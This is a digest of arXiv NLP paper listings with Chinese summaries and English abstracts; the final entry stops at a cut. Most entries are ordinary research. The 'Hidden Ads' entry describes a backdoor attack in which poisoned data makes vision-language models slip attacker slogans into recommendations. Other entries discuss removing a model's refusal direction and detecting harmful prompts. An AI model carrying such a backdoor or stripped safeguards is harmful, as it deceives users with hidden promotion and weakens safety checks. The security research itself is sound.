【速读】: 该论文旨在解决跨语言迁移学习中源语言选择策略评估不严谨的问题,即现有研究未控制总训练数据量,导致语言选择效果与数据量效应混淆。为此,作者提出Budget-Xfer框架,将多源跨语言迁移建模为预算约束下的资源分配问题:在固定标注预算B的前提下,联合优化应包含哪些源语言以及从每个源语言分配多少数据。其核心创新在于通过系统性实验(288次)验证了多源迁移显著优于单源迁移(Cohen’s d = 0.80–1.98),并揭示结构化预算未充分利用是性能瓶颈,同时发现不同多源策略差异较小且不显著,嵌入相似度作为选择代理的效用具有任务依赖性。
链接: https://arxiv.org/abs/2603.27651
作者: Tewodros Kederalah Idris,Roald Eiselen,Prasenjit Mitra
机构: Carnegie Mellon University Africa (卡内基梅隆大学非洲分校); North-West University (西北大学)
类目: Computation and Language (cs.CL)
备注: 5 pages, 5 tables. Submitted to SIGIR 2026 Short Paper track
Abstract:Cross-lingual transfer learning enables NLP for low-resource languages by leveraging labeled data from higher-resource sources, yet existing comparisons of source language selection strategies do not control for total training data, confounding language selection effects with data quantity effects. We introduce Budget-Xfer, a framework that formulates multi-source cross-lingual transfer as a budget-constrained resource allocation problem. Given a fixed annotation budget B, our framework jointly optimizes which source languages to include and how much data to allocate from each. We evaluate four allocation strategies across named entity recognition and sentiment analysis for three African target languages (Hausa, Yoruba, Swahili) using two multilingual models, conducting 288 experiments. Our results show that (1) multi-source transfer significantly outperforms single-source transfer (Cohen’s d = 0.80 to 1.98), driven by a structural budget underutilization bottleneck; (2) among multi-source strategies, differences are modest and non-significant; and (3) the value of embedding similarity as a selection proxy is task-dependent, with random selection outperforming similarity-based selection for NER but not sentiment analysis.
[NLP-53] PRBench: End-to-end Paper Reproduction in Physics Research
【速读】: 该论文旨在解决当前生成式 AI (Generative AI) 代理在真实科学论文中实现端到端复现(end-to-end reproduction)能力不足的问题,即尽管大语言模型(Large Language Models, LLMs)具备较强的推理与问题求解能力,但其能否可靠地从原始论文出发完成完整科研任务仍不明确。解决方案的关键在于构建 PRBench——一个由30个专家精心设计的任务组成的基准测试集,覆盖物理学11个子领域,每个任务要求代理理解论文方法、从零实现算法并产出与原论文一致的定量结果;所有任务均基于真实发表论文,且通过严格验证的真值结果和评分标准进行评估,同时在沙盒环境中运行以确保可重复性和安全性。该基准首次系统性地衡量了AI代理在科学推理与执行层面的综合能力,并揭示了现有代理在代码正确性、数据准确性等方面的显著缺陷。
链接: https://arxiv.org/abs/2603.27646
作者: Shi Qiu,Junyi Deng,Yiwei Deng,Haoran Dong,Jieyu Fu,Mao Li,Zeyu Li,Zhaolong Zhang,Huiwen Zheng,Leidong Bao,Anqi Lv,Zihan Mo,Yadi Niu,Yiyang Peng,Yu Tian,Yili Wang,Ziyu Wang,Zi-Yu Wang,Jiashen Wei,Liuheng Wu,Aoran Xue,Leyi Yang,Guanglu Yuan,Xiarui Zhan,Jingjun Zhang,Zifan Zheng,Pengfei Liu,Linrui Zhen,Kaiyang Li,Qichang Li,Ziheng Zhou,Guo-En Nian,Yunwei Xiao,Qing-Hong Cao,Linjie Dai,Xu Feng,Peng Gao,Ying Gu,Chang Liu,Jia Liu,Ming-xing Luo,Yan-Qing Ma,Liang-You Peng,Huichao Song,Shufeng Wang,Chenxu Wang,Tao Wang,Yi-Nan Wang,Chengyin Wu,Pengwei Zhao,Hua Xing Zhu
机构: Peking University (北京大学); Beijing Computational Science Research Center (北京计算科学研究中心)
类目: Computation and Language (cs.CL); High Energy Physics - Lattice (hep-lat); High Energy Physics - Phenomenology (hep-ph); Computational Physics (physics.comp-ph); Optics (physics.optics)
备注: 17 pages, 3 figures
Abstract:AI agents powered by large language models exhibit strong reasoning and problem-solving capabilities, enabling them to assist scientific research tasks such as formula derivation and code generation. However, whether these agents can reliably perform end-to-end reproduction from real scientific papers remains an open question. We introduce PRBench, a benchmark of 30 expert-curated tasks spanning 11 subfields of physics. Each task requires an agent to comprehend the methodology of a published paper, implement the corresponding algorithms from scratch, and produce quantitative results matching the original publication. Agents are provided only with the task instruction and paper content, and operate in a sandboxed execution environment. All tasks are contributed by domain experts from over 20 research groups at the School of Physics, Peking University, each grounded in a real published paper and validated through end-to-end reproduction with verified ground-truth results and detailed scoring rubrics. Using an agentified assessment pipeline, we evaluate a set of coding agents on PRBench and analyze their capabilities across key dimensions of scientific reasoning and execution. The best-performing agent, OpenAI Codex powered by GPT-5.3-Codex, achieves a mean overall score of 34%. All agents exhibit a zero end-to-end callback success rate, with particularly poor performance in data accuracy and code correctness. We further identify systematic failure modes, including errors in formula implementation, inability to debug numerical simulations, and fabrication of output data. Overall, PRBench provides a rigorous benchmark for evaluating progress toward autonomous scientific research.
[NLP-54] Umwelt Engineering: Designing the Cognitive Worlds of Linguistic Agents
【速读】: 该论文试图解决的问题是:如何通过系统性地设计语言认知环境来提升智能体(agent)的推理能力与认知质量,而不仅仅是依赖传统的提示工程(prompt engineering)或上下文工程(context engineering)。其核心挑战在于验证“语言媒介本身是否能够直接塑造认知过程”,即是否存在一种“语言-认知”因果关系。解决方案的关键在于提出并实证检验“Umwelt工程”(Umwelt engineering),这是一种上游层面的设计策略,通过对词汇约束(如消除“to have”或“to be”)重构语言使用范式,从而诱导模型认知结构发生实质性变化。实验表明,这种语言约束能显著改善伦理推理、分类准确性和元认知校准等指标,并通过多代理协同实现更全面的问题覆盖,揭示出“认知重构”与“认知多样性”两大机制,为构建更具鲁棒性和可解释性的AI系统提供了新路径。
链接: https://arxiv.org/abs/2603.27626
作者: Rodney Jehu-Appiah
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注: 24 pages, 2 figures, 7 tables
Abstract:I propose Umwelt engineering – the deliberate design of the linguistic cognitive environment – as a third layer in the agent design stack, upstream of both prompt and context engineering. Two experiments test the thesis that altering the medium of reasoning alters cognition itself. In Experiment 1, three language models reason under two vocabulary constraints – No-Have (eliminating possessive “to have”) and E-Prime (eliminating “to be”) – across seven tasks (N=4,470 trials). No-Have improves ethical reasoning by 19.1 pp (p 0.001), classification by 6.5 pp (p 0.001), and epistemic calibration by 7.4 pp, while achieving 92.8% constraint compliance. E-Prime shows dramatic but model-dependent effects: cross-model correlations reach r = -0.75. In Experiment 2, 16 linguistically constrained agents tackle 17 debugging problems. No constrained agent outperforms the control individually, yet a 3-agent ensemble achieves 100% ground-truth coverage versus 88.2% for the control. A permutation test confirms only 8% of random 3-agent subsets achieve full coverage, and every successful subset contains the counterfactual agent. Two mechanisms emerge: cognitive restructuring and cognitive diversification. The primary limitation is the absence of an active control matching constraint prompt elaborateness.
[NLP-55] LongCat-Next: Lexicalizing Modalities as Discrete Tokens
【速读】: 该论文旨在解决当前多模态系统仍以语言为中心、非语言模态(如视觉和音频)常被作为外部附加模块处理所导致的架构碎片化与整合效率低下问题。其核心解决方案是提出一种统一的离散原生自回归框架(Discrete Native Autoregressive, DiNA),通过将多模态信息映射到共享的离散空间,实现跨模态的一致且原则性的自回归建模。关键创新在于设计了离散原生任意分辨率视觉Transformer(dNaViT),可对连续视觉信号进行任意分辨率的离散化tokenization与de-tokenization,从而构建出一个原生支持文本、视觉和音频的多模态模型LongCat-Next,该模型在单一自回归目标下完成理解与生成任务,显著提升了离散视觉建模在理解类任务上的性能瓶颈,并有效调和了理解与生成之间的冲突。
链接: https://arxiv.org/abs/2603.27538
作者: Meituan LongCat Team:Bin Xiao,Chao Wang,Chengjiang Li,Chi Zhang,Chong Peng,Hang Yu,Hao Yang,Haonan Yan,Haoze Sun,Haozhe Zhao,Hong Liu,Hui Su,Jiaqi Zhang,Jiawei Wang,Jing Li,Kefeng Zhang,Manyuan Zhang,Minhao Jing,Peng Pei,Quan Chen,Taofeng Xue,Tongxin Pan,Xiaotong Li,Xiaoyang Li,Xiaoyu Zhao,Xing Hu,Xinyang Lin,Xunliang Cai,Yan Bai,Yan Feng,Yanjie Li,Yao Qiu,Yerui Sun,Yifan Lu,Ying Luo,Yipeng Mei,Yitian Chen,Yuchen Xie,Yufang Liu,Yufei Chen,Yulei Qian,Yuqi Peng,Zhihang Yu,Zhixiong Han,Changran Wang,Chen Chen,Dian Zheng,Fengjiao Chen,Ge Yang,Haowei Guo,Haozhe Wang,Hongyu Li,Huicheng Jiang,Jiale Hong,Jialv Zou,Jiamu Li,Jianping Lin,Jiaxing Liu,Jie Yang,Jing Jin,Jun Kuang,Juncheng She,Kunming Luo,Kuofeng Gao,Lin Qiu,Linsen Guo,Mianqiu Huang,Qi Li,Qian Wang,Rumei Li,Siyu Ren,Wei Wang,Wenlong He,Xi Chen,Xiao Liu,Xiaoyu Li,Xu Huang,Xuanyu Zhu,Xuezhi Cao,Yaoming Zhu,Yifei Cao,Yimeng Jia,Yizhen Jiang,Yufei Gao,Zeyang Hu,Zhenlong Yuan,Zijian Zhang,Ziwen Wang
机构: Meituan LongCat Team(美团龙猫团队)
类目: Computer Vision and Pattern Recognition (cs.CV); Computation and Language (cs.CL)
备注: LongCat-Next Technical Report
Abstract:The prevailing Next-Token Prediction (NTP) paradigm has driven the success of large language models through discrete autoregressive modeling. However, contemporary multimodal systems remain language-centric, often treating non-linguistic modalities as external attachments, leading to fragmented architectures and suboptimal integration. To transcend this limitation, we introduce Discrete Native Autoregressive (DiNA), a unified framework that represents multimodal information within a shared discrete space, enabling a consistent and principled autoregressive modeling across modalities. A key innovation is the Discrete Native Any-resolution Visual Transformer (dNaViT), which performs tokenization and de-tokenization at arbitrary resolutions, transforming continuous visual signals into hierarchical discrete tokens. Building on this foundation, we develop LongCat-Next, a native multimodal model that processes text, vision, and audio under a single autoregressive objective with minimal modality-specific design. As an industrial-strength foundation model, it excels at seeing, painting, and talking within a single framework, achieving strong performance across a wide range of multimodal benchmarks. In particular, LongCat-Next addresses the long-standing performance ceiling of discrete vision modeling on understanding tasks and provides a unified approach to effectively reconcile the conflict between understanding and generation. As an attempt toward native multimodality, we open-source the LongCat-Next and its tokenizers, hoping to foster further research and development in the community. GitHub: this https URL
[NLP-56] A gentle tutorial and a structured reformulation of Bocks algorithm for minimum directed spanning trees
【速读】: 该论文旨在解决Bock于1971年提出的构造最小有向生成树(minimum directed spanning tree)算法在现代读者中的可读性与可复现性问题,并阐明其作为非投射图依赖句法分析(nonprojective graph-based dependency parsing)精确解码器的适用性。解决方案的关键在于:首先以清晰的结构化方式重述原始算法的目标函数和执行流程,提供从初始化到终止的完整逐行执行轨迹;其次引入一种显式描述阶段结构、状态维护与控制流的重构版本,在保持原逻辑不变的前提下提升算法的透明度与实用性;最后通过一个来自Jurafsky & Martin(2026)教材的依赖解析实例,展示如何通过标准仿射变换将最大权重有向生成树问题转化为Bock的最小成本形式,并在同一状态变量下完成追踪,从而验证其在实际自然语言处理任务中的有效性。
链接: https://arxiv.org/abs/2603.27530
作者: Yuxi Wang,Jungyeul Park
机构: 未知
类目: Computation and Language (cs.CL)
备注:
Abstract:This paper presents a gentle tutorial and a structured reformulation of Bock’s 1971 Algol procedure for constructing minimum directed spanning trees. Our aim is to make the original algorithm readable and reproducible for modern readers, while highlighting its relevance as an exact decoder for nonprojective graph based dependency parsing. We restate the minimum arborescence objective in Bock’s notation and provide a complete line by line execution trace of the original ten node example, extending the partial trace given in the source paper from initialization to termination. We then introduce a structured reformulation that makes explicit the procedure’s phase structure, maintained state, and control flow, while preserving the logic of the original method. As a further illustration, we include a worked example adapted from jurafsky-martin-2026-book for dependency parsing, showing how a maximum weight arborescence problem is reduced to Bock’s minimum cost formulation by a standard affine transformation and traced under the same state variables.
[NLP-57] Hidden Ads: Behavior Triggered Semantic Backdoors for Advertisement Injection in Vision Language Models
【速读】: 该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在消费级推荐场景中面临的新型后门攻击问题,即“隐藏广告”(Hidden Ads)——这类攻击利用用户自然行为(如上传特定语义内容图像并提出推荐请求)触发未经授权的广告插入,同时保持模型在正常任务上的准确性与实用性。其解决方案的关键在于设计一种基于多层级威胁框架的攻击方法,通过教师VLM生成的思维链推理(chain-of-thought reasoning)构建自然触发-标语关联数据,使攻击能在不依赖人工标记触发器的情况下实现高隐蔽性、高注入成功率和低误报率,并具备跨域迁移能力与多并发广告注入能力,显著提升了现实部署中的可行性与危害性。
链接: https://arxiv.org/abs/2603.27522
作者: Duanyi Yao,Changyue Li,Zhicong Huang,Cheng Hong,Songze Li
机构: 未知
类目: Computation and Language (cs.CL); Cryptography and Security (cs.CR); Machine Learning (cs.LG)
备注:
Abstract:Vision-Language Models (VLMs) are increasingly deployed in consumer applications where users seek recommendations about products, dining, and services. We introduce Hidden Ads, a new class of backdoor attacks that exploit this recommendation-seeking behavior to inject unauthorized advertisements. Unlike traditional pattern-triggered backdoors that rely on artificial triggers such as pixel patches or special tokens, Hidden Ads activates on natural user behaviors: when users upload images containing semantic content of interest (e.g., food, cars, animals) and ask recommendation-seeking questions, the backdoored model provides correct, helpful answers while seamlessly appending attacker-specified promotional slogans. This design preserves model utility and produces natural-sounding injections, making the attack practical for real-world deployment in consumer-facing recommendation services. We propose a multi-tier threat framework to systematically evaluate Hidden Ads across three adversary capability levels: hard prompt injection, soft prompt optimization, and supervised fine-tuning. Our poisoned data generation pipeline uses teacher VLM-generated chain-of-thought reasoning to create natural trigger–slogan associations across multiple semantic domains. Experiments on three VLM architectures demonstrate that Hidden Ads achieves high injection efficacy with near-zero false positives while maintaining task accuracy. Ablation studies confirm that the attack is data-efficient, transfers effectively to unseen datasets, and scales to multiple concurrent domain-slogan pairs. We evaluate defenses including instruction-based filtering and clean fine-tuning, finding that both fail to remove the backdoor without causing significant utility degradation. Subjects: Computation and Language (cs.CL); Cryptography and Security (cs.CR); Machine Learning (cs.LG) Cite as: arXiv:2603.27522 [cs.CL] (or arXiv:2603.27522v1 [cs.CL] for this version) https://doi.org/10.48550/arXiv.2603.27522 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[NLP-58] Over-Refusal and Representation Subspaces: A Mechanistic Analysis of Task-Conditioned Refusal in Aligned LLM s
【速读】: 该论文旨在解决对齐语言模型中存在的“过度拒绝”(over-refusal)问题,即模型在面对看似有害但实际安全的请求时仍会错误地拒绝。研究表明,这种现象源于有害拒绝与过度拒绝在表征几何结构上的本质差异:有害拒绝方向具有任务无关性,可由单一全局向量捕获;而过度拒绝方向则依赖于具体任务,分布在良性任务表示簇内部,维度更高且随任务变化。因此,解决方案的关键在于摒弃传统的全局方向消融方法,转而采用基于任务特定几何干预的策略,以精准修正过度拒绝而不破坏整体拒绝机制。
链接: https://arxiv.org/abs/2603.27518
作者: Utsav Maskey,Mark Dras,Usman Naseem
机构: Macquarie University (麦考瑞大学)
类目: Computation and Language (cs.CL)
备注: Preprint
Abstract:Aligned language models that are trained to refuse harmful requests also exhibit over-refusal: they decline safe instructions that seemingly resemble harmful instructions. A natural approach is to ablate the global refusal direction, steering the hidden-state vectors away or towards the harmful-refusal examples, but this corrects over-refusal only incidentally while disrupting the broader refusal mechanism. In this work, we analyse the representational geometry of both refusal types to understand why this happens. We show that harmful-refusal directions are task-agnostic and can be captured by a single global vector, whereas over-refusal directions are task-dependent: they reside within the benign task-representation clusters, vary across tasks, and span a higher-dimensional subspace. Linear probing confirms that the two refusal types are representationally distinct from the early transformer layers. These findings provide a mechanistic explanation of why global direction ablation alone cannot address over-refusal, and establish that task-specific geometric interventions are necessary.
[NLP-59] A tree interpretation of arc standard dependency derivation
【速读】: 该论文旨在解决依赖句法分析中非投射性(non-projectivity)结构的建模与稳定恢复问题,尤其是在基于转换的解析器框架下如何有效处理投射性(projectivity)限制。其解决方案的关键在于提出一种**弧标准转换序列(arc-standard transition sequence)**的树表示方法:通过将每个转换操作(shift、leftarc、rightarc)直接解释为有序树的确定性更新,从而生成具有表面连续产出(surface-contiguous yields)和稳定词项锚定(stable lexical anchoring)的唯一有序树结构。该表示不仅等价于原始依赖弧的完整信息,且能精确刻画投射性——即一个单头依赖树存在此类有序表示当且仅当它是投射的。对于非投射输入,可通过伪投射提升(pseudo-projective lifting)预处理与逆解码(inverse decoding)后处理实现实际应用。
链接: https://arxiv.org/abs/2603.27459
作者: Zihao Huang,Ai Ka Lee,Jungyeul Park
机构: 未知
类目: Computation and Language (cs.CL)
备注:
Abstract:We show that arc-standard derivations for projective dependency trees determine a unique ordered tree representation with surface-contiguous yields and stable lexical anchoring. Each \textscshift, \textscleftarc, and \textscrightarc transition corresponds to a deterministic tree update, and the resulting hierarchical object uniquely determines the original dependency arcs. We further show that this representation characterizes projectivity: a single-headed dependency tree admits such a contiguous ordered representation if and only if it is projective. The proposal is derivational rather than convertive. It interprets arc-standard transition sequences directly as ordered tree construction, rather than transforming a completed dependency graph into a phrase-structure output. For non-projective inputs, the same interpretation can be used in practice via pseudo-projective lifting before derivation and inverse decoding after recovery. A proof-of-concept implementation in a standard neural transition-based parser shows that the mapped derivations are executable and support stable dependency recovery.
[NLP-60] Multi-Agent Dialectical Refinement for Enhanced Argument Classification
【速读】: 该论文旨在解决生成式 AI(Generative AI)在论点挖掘(Argument Mining, AM)任务中面临的两大挑战:一是传统监督学习方法依赖昂贵的领域特定微调;二是大型语言模型(Large Language Models, LLMs)在处理结构歧义时易混淆论点组件(如主张与前提),且单代理自我修正机制常因“谄媚倾向”(sycophancy)而强化初始错误。解决方案的关键在于提出MAD-ACC(Multi-Agent Debate for Argument Component Classification)框架,其核心是采用“支持者-反对者-裁判”多智能体辩论机制,通过辩证精炼(dialectical refinement)暴露文本中的逻辑细微差别,从而提升分类准确性与可解释性。实验表明,该方法在UKP学生作文语料库上达到85.7%的宏平均F1分数,显著优于单代理基线,并且无需领域训练即可实现透明、可读的决策推理过程。
链接: https://arxiv.org/abs/2603.27451
作者: Jakub Bąba,Jarosław A. Chudziak
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注: Accepted for publication in the proceedings of ACIIDS 2026
Abstract:Argument Mining (AM) is a foundational technology for automated writing evaluation, yet traditional supervised approaches rely heavily on expensive, domain-specific fine-tuning. While Large Language Models (LLMs) offer a training-free alternative, they often struggle with structural ambiguity, failing to distinguish between similar components like Claims and Premises. Furthermore, single-agent self-correction mechanisms often suffer from sycophancy, where the model reinforces its own initial errors rather than critically evaluating them. We introduce MAD-ACC (Multi-Agent Debate for Argument Component Classification), a framework that leverages dialectical refinement to resolve classification uncertainty. MAD-ACC utilizes a Proponent-Opponent-Judge model where agents defend conflicting interpretations of ambiguous text, exposing logical nuances that single-agent models miss. Evaluation on the UKP Student Essays corpus demonstrates that MAD-ACC achieves a Macro F1 score of 85.7%, significantly outperforming single-agent reasoning baselines, without requiring domain-specific training. Additionally, unlike “black-box” classifiers, MAD-ACC’s dialectical approach offers a transparent and explainable alternative by generating human-readable debate transcripts that explain the reasoning behind decisions.
[NLP-61] Improving Attributed Long-form Question Answering with Intent Awareness
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在生成知识密集型长篇报告时质量不足的问题,其核心挑战在于模型缺乏对作者撰写意图和推理过程的理解。为应对这一问题,研究提出通过结构化的标签化方案来显式提取并引导模型识别隐含的写作意图(如引用动机、论证目标等),从而增强模型的意图感知能力。解决方案的关键在于利用这些提取出的意图作为指导信号,不仅提升了模型在零样本场景下的生成质量,还支持构建高质量合成数据用于微调小型模型,最终在科学报告生成任务中显著改善了内容准确性、可读性和引用合理性。
链接: https://arxiv.org/abs/2603.27435
作者: Xinran Zhao,Aakanksha Naik,Jay DeYoung,Joseph Chee Chang,Jena D. Hwang,Tongshuang Wu,Varsha Kishore
机构: Allen Institute for AI (艾伦人工智能研究所); Carnegie Mellon University (卡内基梅隆大学); University of Washington (华盛顿大学)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注: 39 pages, 7 figures
Abstract:Large language models (LLMs) are increasingly being used to generate comprehensive, knowledge-intensive reports. However, while these models are trained on diverse academic papers and reports, they are not exposed to the reasoning processes and intents that guide authors in crafting these documents. We hypothesize that enhancing a model’s intent awareness can significantly improve the quality of generated long-form reports. We develop and employ structured, tag-based schemes to better elicit underlying implicit intents to write or cite. We demonstrate that these extracted intents enhance both zero-shot generation capabilities in LLMs and enable the creation of high-quality synthetic data for fine-tuning smaller models. Our experiments reveal improved performance across various challenging scientific report generation tasks, with an average improvement of +2.9 and +12.3 absolute points for large and small models over baselines, respectively. Furthermore, our analysis illuminates how intent awareness enhances model citation usage and substantially improves report readability.
[NLP-62] he Geometry of Harmful Intent: Training-Free Anomaly Detection via Angular Deviation in LLM Residual Streams
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)中无监督、无需训练即可检测有害提示(harmful prompts)的问题。传统方法通常依赖于大量标注的有害样本进行训练,而本文提出了一种无需任何有害样本的训练-free 方法 LatentBiopsy,其核心在于分析模型残差流(residual-stream)激活空间中的几何结构:通过计算 200 个安全规范提示在目标层的激活主成分方向,将新提示的径向偏离角 θ 作为特征,并基于高斯拟合计算其负对数似然作为异常分数,从而实现对有害提示的敏感识别。该方案的关键创新在于利用提示在残差流空间中的角度分布差异——有害提示表现出极窄的近退化角分布(σ_θ ≈ 0.03 rad),显著区别于正常提示的宽泛分布(σ_θ ≈ 0.27 rad),且该几何特性在模型对齐(alignment)阶段及拒绝机制删减后仍保持稳定,支持方向无关的评分策略,实现了高精度(AUROC ≥ 0.937)和低延迟(亚毫秒级)的检测性能。
链接: https://arxiv.org/abs/2603.27412
作者: Isaac Llorente-Saguer
机构: Qwen (通义千问)
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: 20 pages, 10 figures, 3 tables. Training-free harmful-prompt detector via angular deviation in LLM residual streams. Evaluated on six Qwen variants (base / instruct / abliterated). Achieves AUROC over 0.937 (harmful-vs-normative) and 1.000 (harmful-vs-benign-aggressive) with no harmful training data
Abstract:We present LatentBiopsy, a training-free method for detecting harmful prompts by analysing the geometry of residual-stream activations in large language models. Given 200 safe normative prompts, LatentBiopsy computes the leading principal component of their activations at a target layer and characterises new prompts by their radial deviation angle \theta from this reference direction. The anomaly score is the negative log-likelihood of \theta under a Gaussian fit to the normative distribution, flagging deviations symmetrically regardless of orientation. No harmful examples are required for training. We evaluate two complete model triplets from the Qwen3.5-0.8B and Qwen2.5-0.5B families: base, instruction-tuned, and \emphabliterated (refusal direction surgically removed via orthogonalisation). Across all six variants, LatentBiopsy achieves AUROC \geq 0.937 for harmful-vs-normative detection and AUROC = 1.000 for discriminating harmful from benign-aggressive prompts (XSTest), with sub-millisecond per-query overhead. Three empirical findings emerge. First, geometry survives refusal ablation: both abliterated variants achieve AUROC at most 0.015 below their instruction-tuned counterparts, establishing a geometric dissociation between harmful-intent representation and the downstream generative refusal mechanism. Second, harmful prompts exhibit a near-degenerate angular distribution ( \sigma_\theta \approx 0.03 rad), an order of magnitude tighter than the normative distribution ( \sigma_\theta \approx 0.27 rad), preserved across all alignment stages including abliteration. Third, the two families exhibit opposite ring orientations at the same depth: harmful prompts occupy the outer ring in Qwen3.5-0.8B but the inner ring in Qwen2.5-0.5B, directly motivating the direction-agnostic scoring rule. Comments: 20 pages, 10 figures, 3 tables. Training-free harmful-prompt detector via angular deviation in LLM residual streams. Evaluated on six Qwen variants (base / instruct / abliterated). Achieves AUROC over 0.937 (harmful-vs-normative) and 1.000 (harmful-vs-benign-aggressive) with no harmful training data Subjects: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computation and Language (cs.CL) ACMclasses: I.2.7 Cite as: arXiv:2603.27412 [cs.LG] (or arXiv:2603.27412v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.27412 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[NLP-63] Not Worth Mentioning? A Pilot Study on Salient Proposition Annotation
【速读】: 该论文旨在解决自然语言处理中关于命题显著性(proposition salience)的量化问题,即如何在真实语料中操作化地定义和测量不同命题的重要性梯度。以往研究多集中于抽取式摘要(extractive summarization),侧重于提取重要命题,但缺乏对命题显著性进行分级评估的方法。本文的关键解决方案是借鉴已有研究中的显著实体抽取(Salient Entity Extraction, SEE)所采用的分级摘要型显著性指标,并将其扩展至命题层面,通过定义新的标注任务,在多体裁小规模数据集上进行实证评估,从而建立命题显著性与基于修辞结构理论(Rhetorical Structure Theory, RST)的篇章单元中心性之间的初步关联。
链接: https://arxiv.org/abs/2603.27358
作者: Amir Zeldes,Katherine Conhaim,Lauren Levine
机构: Georgetown University (乔治城大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:Despite a long tradition of work on extractive summarization, which by nature aims to recover the most important propositions in a text, little work has been done on operationalizing graded proposition salience in naturally occurring data. In this paper, we adopt graded summarization-based salience as a metric from previous work on Salient Entity Extraction (SEE) and adapt it to quantify proposition salience. We define the annotation task, apply it to a small multi-genre dataset, evaluate agreement and carry out a preliminary study of the relationship between our metric and notions of discourse unit centrality in discourse parsing following Rhetorical Structure Theory (RST).
[NLP-64] Culturally Adaptive Explainable LLM Assessment for Multilingual Information Disorder: A Human-in-the-Loop Approach LREC2026
【速读】: 该论文旨在解决当前大型语言模型(Large Language Models, LLMs)在识别信息失序(Information Disorder)时因文化与语言背景局限性而导致的解释能力不足问题,尤其体现在其生成的推理过程常忽略本地化语境,缺乏跨文化一致性。解决方案的关键在于提出一种“混合智能循环”(Hybrid Intelligence Loop)框架,该框架采用人机协同(Human-in-the-Loop, HITL)机制,通过引入母语标注者撰写的真实理由(rationales),结合上下文学习(In-Context Learning, ICL)动态检索目标语言示例,替代传统的静态少样本提示方法,从而提升模型在不同文化语境下对新闻操纵的判别准确性、推理合理性及解释的文化适配性。
链接: https://arxiv.org/abs/2603.27356
作者: Maziar Kianimoghadam Jouneghani
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI); Computers and Society (cs.CY)
备注: 9 pages, 3 figures, 1 table. Accepted to the Information Disorder Workshop at LREC 2026
Abstract:Recognizing information disorder is difficult because judgments about manipulation depend on cultural and linguistic context. Yet current Large Language Models (LLMs) often behave as monocultural, English-centric “black boxes,” producing fluent rationales that overlook localized framing. Preliminary evidence from the multilingual Information Disorder (InDor) corpus suggests that existing models struggle to explain manipulated news consistently across communities. To address this gap, this ongoing study proposes a Hybrid Intelligence Loop, a human-in-the-loop (HITL) framework that grounds model assessment in human-written rationales from native-speaking annotators. The approach moves beyond static target-language few-shot prompting by pairing English task instructions with dynamically retrieved target-language exemplars drawn from filtered InDor annotations through In-Context Learning (ICL). In the initial pilot, the Exemplar Bank is seeded from these filtered annotations and used to compare static and adaptive prompting on Farsi and Italian news. The study evaluates span and severity prediction, the quality and cultural appropriateness of generated rationales, and model alignment across evaluator groups, providing a testbed for culturally grounded explainable AI.
[NLP-65] LLM Readiness Harness: Evaluation Observability and CI Gates for LLM /RAG Applications
【速读】: 该论文旨在解决大语言模型(Large Language Model, LLM)和检索增强生成(Retrieval-Augmented Generation, RAG)应用在部署前缺乏系统性、可操作的评估与决策机制的问题。现有方法通常仅提供离线指标分数,无法有效指导是否真正具备上线条件。其解决方案的关键在于构建一个“就绪度工作流”(readiness harness),通过整合自动化基准测试、OpenTelemetry可观测性以及持续集成(CI)质量门禁,在最小API契约下聚合多个维度指标(如工作流成功率、策略合规性、事实一致性、召回率、成本和p95延迟),并基于场景权重生成帕累托前沿(Pareto frontiers)的就绪评分,从而将评估转化为可执行的部署决策流程。该框架已在票务路由和BEIR接地任务(SciFact与FiQA)中验证有效性,证明了其能识别出高风险提示变体并阻止不安全发布,实现可复现且面向运维落地的LLM/RAG系统就绪判断。
链接: https://arxiv.org/abs/2603.27355
作者: Alexandre Cristovão Maiorano
机构: Lumytics
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Software Engineering (cs.SE)
备注: 18 pages, 4 figures, 15 tables, arXiv preprint
Abstract:We present a readiness harness for LLM and RAG applications that turns evaluation into a deployment decision workflow. The system combines automated benchmarks, OpenTelemetry observability, and CI quality gates under a minimal API contract, then aggregates workflow success, policy compliance, groundedness, retrieval hit rate, cost, and p95 latency into scenario-weighted readiness scores with Pareto frontiers. We evaluate the harness on ticket-routing workflows and BEIR grounding tasks (SciFact and FiQA) with full Azure matrix coverage (162/162 valid cells across datasets, scenarios, retrieval depths, seeds, and models). Results show that readiness is not a single metric: on FiQA under sla-first at k=5, gpt-4.1-mini leads in readiness and faithfulness, while gpt-5.2 pays a substantial latency cost; on SciFact, models are closer in quality but still separable operationally. Ticket-routing regression gates consistently reject unsafe prompt variants, demonstrating that the harness can block risky releases instead of merely reporting offline scores. The result is a reproducible, operationally grounded framework for deciding whether an LLM or RAG system is ready to ship.
[NLP-66] Inference-Time Structural Reasoning for Compositional Vision-Language Understanding
【速读】: 该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在组合推理(compositional reasoning)能力上的不足,特别是其在区分语义相同但关系结构不同的图像描述(caption)时表现不佳的问题。针对此问题,作者提出了一种统一的评估与增强框架,在Winoground基准上对四种架构各异的VLMs(CLIP、BLIP、LLaVA和Qwen3-VL-8B-Thinking)进行评测,并引入基于依赖句法分析的TextSceneGraphParser(使用spaCy实现)提取主语-关系-宾语三元组,以及利用最优二分匹配的图不对称性评分器(Graph Asymmetry Scorer)注入结构化关系先验。关键创新在于多轮场景图(scene-graph, SG)过滤策略,显著提升了Qwen3-VL-8B-Thinking模型的性能至66.0,超越现有开源模型,同时揭示了场景图增强对能力强模型有正向提升作用,而对弱基线模型则效果有限甚至负面。
链接: https://arxiv.org/abs/2603.27349
作者: Amartya Bhattacharya
机构: Dartmouth College (达特茅斯学院)
类目: Computer Vision and Pattern Recognition (cs.CV); Computation and Language (cs.CL)
备注:
